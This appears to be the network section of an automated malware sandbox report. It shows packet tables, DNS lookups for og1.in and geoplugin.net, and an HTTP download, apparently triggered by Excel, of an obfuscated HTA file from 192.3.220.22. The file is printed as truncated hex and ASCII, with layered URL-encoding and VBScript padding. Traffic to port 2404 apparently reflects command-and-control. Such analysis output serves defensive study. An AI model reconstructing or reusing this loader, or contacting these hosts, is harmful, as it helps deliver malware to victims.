Sep 30, 2024 09:57:01.538502932 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.538513899 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.538526058 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.538544893 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.538556099 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.538572073 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.538583994 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.538594961 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.538604975 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.538606882 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.538624048 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.538635015 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.538712978 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.538723946 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.538733959 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.538746119 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.538747072 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.538757086 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.538764000 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.538768053 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.538777113 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.538779974 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.538789988 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.538791895 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.538803101 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.538803101 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.538815022 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.538830042 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.538867950 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.538880110 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.538889885 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.538899899 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.538903952 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.538911104 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.538918972 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.538922071 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.538932085 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.538932085 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.538943052 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.538948059 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.538953066 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.538959980 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.538964987 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.538974047 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.538985014 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.538995981 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.539320946 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.539330959 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.539341927 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.539355040 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.539367914 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.539381981 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.539391994 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.539402962 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.539413929 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.539427042 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.539427042 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.539439917 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.539453983 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.539509058 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.539520025 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.539530039 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.539541006 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.539542913 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.539551973 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.539556980 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.539563894 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.539572001 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.539573908 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.539586067 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.539587021 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.539597988 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.539597988 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.539643049 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.539648056 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.539659977 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.539670944 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.539680004 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.539680958 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.539690971 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.539694071 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.539705038 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.539705038 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.539716959 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.539716959 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.539730072 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.539733887 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.539741993 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.539747000 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.539756060 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.539757967 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.539774895 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.539786100 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.540147066 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.540158033 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.540169954 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.540185928 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.540199995 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.541012049 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.541023016 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.541034937 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.541054964 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.541066885 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.541769028 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.541780949 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.541793108 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.541807890 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.541820049 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.542587042 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.542598009 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.542608023 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.542629004 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.542644024 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.543596029 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.543606997 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.543617964 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.543631077 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.543642044 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.544169903 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.544182062 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.544193029 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.544203997 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.544205904 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.544219971 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.544231892 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.545125961 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.545140028 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.545150995 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.545162916 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.545166969 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.545181990 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.545193911 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.545356989 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.545404911 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.545409918 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.545444012 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:02.141578913 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:05.951268911 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:05.951351881 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:13.504046917 CEST | 2404 | 49174 | 107.173.4.16 | 192.168.2.22
Sep 30, 2024 09:57:13.538753033 CEST | 49174 | 2404 | 192.168.2.22 | 107.173.4.16
Sep 30, 2024 09:57:13.543587923 CEST | 2404 | 49174 | 107.173.4.16 | 192.168.2.22
Sep 30, 2024 09:57:27.354000092 CEST | 49175 | 2404 | 192.168.2.22 | 107.173.4.16
Sep 30, 2024 09:57:27.366692066 CEST | 2404 | 49175 | 107.173.4.16 | 192.168.2.22
Sep 30, 2024 09:57:27.366785049 CEST | 49175 | 2404 | 192.168.2.22 | 107.173.4.16
Sep 30, 2024 09:57:27.374104977 CEST | 2404 | 49175 | 107.173.4.16 | 192.168.2.22
Sep 30, 2024 09:57:27.374166965 CEST | 49175 | 2404 | 192.168.2.22 | 107.173.4.16
Sep 30, 2024 09:57:27.379439116 CEST | 2404 | 49175 | 107.173.4.16 | 192.168.2.22
Sep 30, 2024 09:57:27.379450083 CEST | 2404 | 49175 | 107.173.4.16 | 192.168.2.22
Sep 30, 2024 09:57:27.379494905 CEST | 49175 | 2404 | 192.168.2.22 | 107.173.4.16
Sep 30, 2024 09:57:27.386059999 CEST | 2404 | 49175 | 107.173.4.16 | 192.168.2.22
Sep 30, 2024 09:57:27.386070967 CEST | 2404 | 49175 | 107.173.4.16 | 192.168.2.22
Sep 30, 2024 09:57:27.386120081 CEST | 49175 | 2404 | 192.168.2.22 | 107.173.4.16
Sep 30, 2024 09:57:27.392792940 CEST | 2404 | 49175 | 107.173.4.16 | 192.168.2.22
Sep 30, 2024 09:57:27.392803907 CEST | 2404 | 49175 | 107.173.4.16 | 192.168.2.22
Sep 30, 2024 09:57:27.392813921 CEST | 2404 | 49175 | 107.173.4.16 | 192.168.2.22
Sep 30, 2024 09:57:27.392865896 CEST | 49175 | 2404 | 192.168.2.22 | 107.173.4.16
Sep 30, 2024 09:57:27.393467903 CEST | 2404 | 49175 | 107.173.4.16 | 192.168.2.22
Sep 30, 2024 09:57:27.399604082 CEST | 2404 | 49175 | 107.173.4.16 | 192.168.2.22
Sep 30, 2024 09:57:27.399614096 CEST | 2404 | 49175 | 107.173.4.16 | 192.168.2.22
Sep 30, 2024 09:57:27.399646044 CEST | 2404 | 49175 | 107.173.4.16 | 192.168.2.22
Sep 30, 2024 09:57:27.399655104 CEST | 2404 | 49175 | 107.173.4.16 | 192.168.2.22
Sep 30, 2024 09:57:27.399987936 CEST | 49175 | 2404 | 192.168.2.22 | 107.173.4.16
Sep 30, 2024 09:57:27.621191025 CEST | 2404 | 49175 | 107.173.4.16 | 192.168.2.22
Sep 30, 2024 09:57:27.624982119 CEST | 2404 | 49175 | 107.173.4.16 | 192.168.2.22
Sep 30, 2024 09:57:27.625041008 CEST | 2404 | 49175 | 107.173.4.16 | 192.168.2.22
Sep 30, 2024 09:57:27.625576973 CEST | 2404 | 49175 | 107.173.4.16 | 192.168.2.22
Sep 30, 2024 09:57:27.625638008 CEST | 49175 | 2404 | 192.168.2.22 | 107.173.4.16
Sep 30, 2024 09:57:43.630815983 CEST | 2404 | 49174 | 107.173.4.16 | 192.168.2.22
Sep 30, 2024 09:57:43.772330999 CEST | 49174 | 2404 | 192.168.2.22 | 107.173.4.16
Sep 30, 2024 09:57:43.777230978 CEST | 2404 | 49174 | 107.173.4.16 | 192.168.2.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 30, 2024 09:53:23.409651995 CEST | 54562 | 53 | 192.168.2.22 | 8.8.8.8
Sep 30, 2024 09:53:23.420861959 CEST | 53 | 54562 | 8.8.8.8 | 192.168.2.22
Sep 30, 2024 09:53:25.754252911 CEST | 52917 | 53 | 192.168.2.22 | 8.8.8.8
Sep 30, 2024 09:53:25.767608881 CEST | 53 | 52917 | 8.8.8.8 | 192.168.2.22
Sep 30, 2024 09:53:46.887208939 CEST | 62751 | 53 | 192.168.2.22 | 8.8.8.8
Sep 30, 2024 09:53:47.061661959 CEST | 53 | 62751 | 8.8.8.8 | 192.168.2.22
Sep 30, 2024 09:56:20.025681019 CEST | 57893 | 53 | 192.168.2.22 | 8.8.8.8
Sep 30, 2024 09:56:20.035784006 CEST | 53 | 57893 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 30, 2024 09:53:23.409651995 CEST | 192.168.2.22 | 8.8.8.8 | 0x96de | Standard query (0) | og1.in | A (IP address) | IN (0x0001) | false
Sep 30, 2024 09:53:25.754252911 CEST | 192.168.2.22 | 8.8.8.8 | 0x591b | Standard query (0) | og1.in | A (IP address) | IN (0x0001) | false
Sep 30, 2024 09:53:46.887208939 CEST | 192.168.2.22 | 8.8.8.8 | 0x5f1d | Standard query (0) | og1.in | A (IP address) | IN (0x0001) | false
Sep 30, 2024 09:56:20.025681019 CEST | 192.168.2.22 | 8.8.8.8 | 0x6070 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 30, 2024 09:53:23.420861959 CEST | 8.8.8.8 | 192.168.2.22 | 0x96de | No error (0) | og1.in | | 104.21.78.54 | A (IP address) | IN (0x0001) | false
Sep 30, 2024 09:53:23.420861959 CEST | 8.8.8.8 | 192.168.2.22 | 0x96de | No error (0) | og1.in | | 172.67.216.244 | A (IP address) | IN (0x0001) | false
Sep 30, 2024 09:53:25.767608881 CEST | 8.8.8.8 | 192.168.2.22 | 0x591b | No error (0) | og1.in | | 172.67.216.244 | A (IP address) | IN (0x0001) | false
Sep 30, 2024 09:53:25.767608881 CEST | 8.8.8.8 | 192.168.2.22 | 0x591b | No error (0) | og1.in | | 104.21.78.54 | A (IP address) | IN (0x0001) | false
Sep 30, 2024 09:53:47.061661959 CEST | 8.8.8.8 | 192.168.2.22 | 0x5f1d | No error (0) | og1.in | | 104.21.78.54 | A (IP address) | IN (0x0001) | false
Sep 30, 2024 09:53:47.061661959 CEST | 8.8.8.8 | 192.168.2.22 | 0x5f1d | No error (0) | og1.in | | 172.67.216.244 | A (IP address) | IN (0x0001) | false
Sep 30, 2024 09:56:20.035784006 CEST | 8.8.8.8 | 192.168.2.22 | 0x6070 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                                                                            • og1.in
                                                                            • 192.3.220.22
                                                                            • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49164 | 192.3.220.22 | 80 | 3660 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 09:53:24.782862902 CEST | 354 | OUT | GET /xampp/en/cookienetbookinetcahce.hta HTTP/1.1
                                                                            Accept: */*
                                                                            UA-CPU: AMD64
                                                                            Accept-Encoding: gzip, deflate
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                            Host: 192.3.220.22
                                                                            Connection: Keep-Alive
Sep 30, 2024 09:53:25.270328999 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                            Date: Mon, 30 Sep 2024 07:53:24 GMT
                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                            Last-Modified: Sun, 29 Sep 2024 17:51:50 GMT
                                                                            ETag: "1ceb2-62345be2e2e61"
                                                                            Accept-Ranges: bytes
                                                                            Content-Length: 118450
                                                                            Keep-Alive: timeout=5, max=100
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/hta
                                                                            Data Raw: 3c 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 33 43 73 63 72 69 70 74 25 33 45 25 30 41 25 33 43 25 32 31 2d 2d 25 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 38 75 6e 65 73 63 61 70 65 25 32 38 25 32 32 25 32 35 33 43 73 63 72 69 70 74 25 32 35 32 30 6c 61 6e 67 75 61 67 65 25 32 35 33 44 4a 61 76 61 53 63 72 69 70 74 25 32 35 33 45 6d 25 32 35 33 44 25 32 35 32 37 25 32 35 32 35 33 43 25 32 35 32 35 32 31 44 4f 43 54 59 50 45 25 32 35 32 35 32 30 68 74 6d 6c 25 32 35 32 35 33 45 25 32 35 32 35 30 41 25 32 35 32 35 33 43 6d 65 74 61 25 32 35 32 35 32 30 68 74 74 70 2d 65 71 75 69 76 25 32 35 32 35 33 44 25 32 35 32 35 32 32 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 25 32 35 32 35 32 32 25 32 35 32 35 32 30 63 6f 6e 74 65 6e 74 25 32 35 32 35 33 44 25 32 35 32 35 32 32 49 45 25 32 35 32 35 33 44 45 6d 75 6c 61 74 65 49 45 38 25 32 35 32 35 32 32 25 32 35 32 35 32 30 25 32 35 32 35 33 45 25 32 35 32 35 30 41 [TRUNCATED]
                                                                            Data Ascii: <script>...document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CSCrIPT%252520LaNGuage%25253D%252522VbsCRiPt%252522%25253E%25250ADiM%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                                            Sep 30, 2024 09:53:25.270344973 CEST1236INData Raw: 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32
                                                                            Data Ascii: 9%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252
                                                                            Sep 30, 2024 09:53:25.270355940 CEST1236INData Raw: 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25
                                                                            Data Ascii: 2509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%
                                                                            Sep 30, 2024 09:53:25.270370007 CEST1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                                            Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                                            Sep 30, 2024 09:53:25.270380974 CEST1236INData Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35
                                                                            Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25
                                                                            Sep 30, 2024 09:53:25.270396948 CEST1120INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39
                                                                            Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509
                                                                            Sep 30, 2024 09:53:25.270409107 CEST1236INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 57 4d 73 4c 47 55 77 6e 62 53 6c 68 61 74 45 42 46 46 63 4c 79 54 52 55 48 78 68 69 76 4b 54 4e 46 44 70 47 56 69 6b 68 4e 45 6f 6a 68 69 44 72 53 53 76 77 57 4d 79 70 77 66 63 52 6f 77 4a 6b 42 55 61 75 4f 56
                                                                            Data Ascii: 52509%252509WMsLGUwnbSlhatEBFFcLyTRUHxhivKTNFDpGVikhNEojhiDrSSvwWMypwfcRowJkBUauOVNXYgiakvADcxUbXmyUVYFPBnBSfzjehxmkdmCGgtBOGliDuHZkzPyeewBmNhwMVcQwxMddOrPyYWRekmiNCupLRmTUUFxtZYHkCutufEzjytFEnpieACMLKZJqUKTanASaMYgFZtMyDpfgzhhMPayhDWi%252509%
                                                                            Sep 30, 2024 09:53:25.270421982 CEST1236INData Raw: 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35
                                                                            Data Ascii: %252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                                            Sep 30, 2024 09:53:25.270435095 CEST1236INData Raw: 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32
